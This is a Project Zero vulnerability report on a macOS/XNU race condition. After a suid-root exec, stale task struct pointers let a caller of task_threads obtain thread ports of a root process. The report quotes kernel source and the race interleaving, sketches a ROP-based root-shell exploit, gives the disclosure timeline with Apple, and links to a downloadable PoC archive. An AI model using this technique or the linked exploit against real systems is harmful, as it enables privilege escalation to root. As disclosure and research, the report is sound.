Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=837
TL;DR
you cannot hold or use a task struct pointer and expect the euid of that task to stay the same.
Many many places in the kernel do this and there are a great many very exploitable bugs as a result.
********
task_t is just a typedef for a task struct *. It's the abstraction level which represents a whole task
comprised of threads and a virtual memory map.
task_t's have a corrisponding mach port type (IKOT_TASK) known as a task port. The task port structure
in the kernel has a pointer to the task struct which it represents. If you have send rights to a task port then
you have control over its VM and, via task_threads, its threads.
When a suid-root binary is executed the kernel invalidates the old task and thread port structures setting their
object pointers to NULL and allocating new ports instead.
CVE-2016-1757 was a race condition concerning the order in which those port structures were invalidated during the
exec operation.
Although the issues I will describe in this bug report may seem similar is is a completely different, and far worse,
bug class.
~~~~~~~~~
When a suid binary is executed it's true that the task's old task and thread ports get invalidated, however, the task
struct itself stays the same. There's no fork and no creation of a new task. This means that any pointers to that task struct
now point to the task struct of an euid 0 process.
There are lots of IOKit drivers which save task struct pointers as members; see my recent bug reports for some examples.
In those cases I reported there was another bug, namely that they weren't taking a reference on the task struct meaning
that if we killed the corrisponding task and then forked and exec'ed a suid root binary we could get the IOKit object
to interact via the task struct pointer with the VM of a euid 0 process. (You could also break out of a sandbox by
forcing launchd to spawn a new service binary which would reuse the free'd task struct.)
However, looking more closely, even if those IOKit drivers *do* take a reference on the task struct it doesn't matter!
(at least not when there are suid binaries around.) Just because the userspace client of the user client had send rights
to a task port at time A when it passed that task port to IOKit doesn't mean that it still has send rights to it when
the IOKit driver actually uses the task struct pointer... In the case of IOSurface this lets us trivially map any RW area
of virtual memory in an euid 0 process into ours and write to it. (See the other exploit I sent for that IOSurface bug.)
There are a large number of IOKit drivers which do this (storing task struct pointers) and then either use the to manipulate
userspace VM (eg IOAcceleratorFamily2, IOThunderboltFamily, IOSurface) or rely on that task struct pointer to perform
authorization checks like the code in IOHIDFamily.
Another interesting case to consider are task struct pointers on the stack.
in the MIG files for the user/kernel interface task ports are subject to the following intran:
type task_t = mach_port_t
#if KERNEL_SERVER
intran: task_t convert_port_to_task(mach_port_t)
where convert_port_to_task is:
task_t
convert_port_to_task(
ipc_port_t port)
{
task_t task = TASK_NULL;
if (IP_VALID(port)) {
ip_lock(port);
if ( ip_active(port) &&
ip_kotype(port) == IKOT_TASK ) {
task = (task_t)port->ip_kobject;
assert(task != TASK_NULL);
task_reference_internal(task);
}
ip_unlock(port);
}
return (task);
}
This converts the task port into the corrisponding task struct pointer. It takes a reference on the task struct but that only
makes sure that it doesn't get free'd, not that its euid doesn't change as the result of the exec of an suid root binary.
As soon as that port lock is dropped the task could exec a suid-root binary and although this task port would no longer be valid
that task struct pointer would remain valid.
This leads to a huge number of interesting race conditions. Grep the source for all .defs files which take a task_t to find them all ;-)
In this exploit PoC I'll target perhaps the most interesting one: task_threads.
Let's look at how task_threads actually works, including the kernel code which is generated by MiG:
In task_server.c (an autogenerated file, build XNU first if you can't find this file) :
target_task = convert_port_to_task(In0P->Head.msgh_request_port);
RetCode = task_threads(target_task, (thread_act_array_t *)&(OutP->act_list.address), &OutP->act_listCnt);
task_deallocate(target_task);
This gives us back the task struct from the task port then calls task_threads:
(unimportant bits removed)
task_threads(
task_t task,
thread_act_array_t *threads_out,
mach_msg_type_number_t *count)
{
...
for (thread = (thread_t)queue_first(&task->threads); i < actual;
++i, thread = (thread_t)queue_next(&thread->task_threads)) {
thread_reference_internal(thread);
thread_list[j++] = thread;
}
...
for (i = 0; i < actual; ++i)
((ipc_port_t *) thread_list)[i] = convert_thread_to_port(thread_list[i]);
}
...
}
task_threads uses the task struct pointer to iterate through the list of threads, then creates send rights to them
which get sent back to user space. There are a few locks taken and dropped in here but they're irrelevant.
What happens if that task is exec-ing a suid root binary at the same time?
The relevant parts of the exec code are these two points in ipc_task_reset and ipc_thread_reset:
void
ipc_task_reset(
task_t task)
{
ipc_port_t old_kport, new_kport;
ipc_port_t old_sself;
ipc_port_t old_exc_actions[EXC_TYPES_COUNT];
int i;
new_kport = ipc_port_alloc_kernel();
if (new_kport == IP_NULL)
panic("ipc_task_reset");
itk_lock(task);
old_kport = task->itk_self;
if (old_kport == IP_NULL) {
itk_unlock(task);
ipc_port_dealloc_kernel(new_kport);
return;
}
task->itk_self = new_kport;
old_sself = task->itk_sself;
task->itk_sself = ipc_port_make_send(new_kport);
ipc_kobject_set(old_kport, IKO_NULL, IKOT_NONE); <-- point (1)
... then calls:
ipc_thread_reset(
thread_t thread)
{
ipc_port_t old_kport, new_kport;
ipc_port_t old_sself;
ipc_port_t old_exc_actions[EXC_TYPES_COUNT];
boolean_t has_old_exc_actions = FALSE;
int i;
new_kport = ipc_port_alloc_kernel();
if (new_kport == IP_NULL)
panic("ipc_task_reset");
thread_mtx_lock(thread);
old_kport = thread->ith_self;
if (old_kport == IP_NULL) {
thread_mtx_unlock(thread);
ipc_port_dealloc_kernel(new_kport);
return;
}
thread->ith_self = new_kport; <-- point (2)
Point (1) clears out the task struct pointer from the old task port and allocates a new port for the task.
Point (2) does the same for the thread port.
Let's call the process which is doing the exec process B and the process doing task_threads() process A and imagine
the following interleaving of execution:
Process A: target_task = convert_port_to_task(In0P->Head.msgh_request_port); // gets pointer to process B's task struct
Process B: ipc_kobject_set(old_kport, IKO_NULL, IKOT_NONE); // process B invalidates the old task port so that it no longer has a task struct pointer
Process B: thread->ith_self = new_kport // process B allocates new thread ports and sets them up
Process A: ((ipc_port_t *) thread_list)[i] = convert_thread_to_port(thread_list[i]); // process A reads and converts the *new* thread port objects!
Note that the fundamental issue here isn't this particular race condition but the fact that a task struct pointer can just
never ever be relied on to have the same euid as when you first got hold of it.
~~~~~~~~~~~~~~~
Exploit:
This PoC exploits exactly this race condition to get a thread port for an euid 0 process. Since we've execd it I just stick a
ret-slide followed by a small ROP payload on the actual stack at exec time then use the thread port to set RIP to a gadget
which does a large add rsp, X and pop's a shell :)
just run it for a while, it's quite a tight race window but it will work! (try a few in parallel)
tested on OS X 10.11.5 (15F34) on MacBookAir5,2
######################################
A faster exploit which also defeats the mitigations shipped in MacOS 10.12. Should work for all kernel versions <= 10.12
######################################
Fixed: https://support.apple.com/en-us/HT207275
Disclosure timeline:
2016-06-02 - Ian Beer reports "task_t considered harmful issue" to Apple
2016-06-30 - Apple requests 60 day disclosure extension.
2016-07-12 - Project Zero declines disclosure extension request.
2016-07-19 - Meeting with Apple to discuss disclosure timeline.
2016-07-21 - Followup meeting with Apple to discuss disclosure timeline.
2016-08-10 - Meeting with Apple to discuss proposed fix and disclosure timeline.
2016-08-15 - Project Zero confirms publication date will be September 21, Apple acknowledges.
2016-08-29 - Meeting with Apple to discuss technical details of (1) "short-term mitigation" that will be shipped within disclosure deadline, and (2) "long-term fix" that will be shipped after the disclosure deadline.
2016-09-13 - Apple release the "short-term mitigation" for iOS 10
2016-09-13 - Apple requests a restriction on disclosed technical details to only those parts of the issue covered by the short-term mitigation.
2016-09-14 - Project Zero confirms that it will disclose full details without restriction.
2016-09-16 - Apple repeats request to withhold details from the disclosure, Project Zero confirms it will disclose full details.
2016-09-17 - Apple requests that Project Zero delay disclosure until a security update in October.
2016-09-18 - Apple's senior leadership contacts Google's senior leadership to request that Project Zero delay disclosure of the task_t issue
2016-09-19 - Google grants a 5 week flexible disclosure extension.
2016-09-20 - Apple release a "short-term mitigation" for the task_t issue for MacOS 10.12
2016-09-21 - Planned publication date passes.
2016-10-03 - Apple publicly release long-term fix for the task_t issue in MacOS beta release version 10.12.1 beta 3.
2016-10-24 - Apple release MacOS version 10.12.1
2016-10-25 - Disclosure date of "task_t considered harmful"
Project Zero remains committed to a 90-day disclosure window, and will continue to apply disclosure deadlines on all of our vulnerability research findings. A 14 day grace extension is available for cases where a patch is expected shortly after the 90-day time window.
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/40669.zip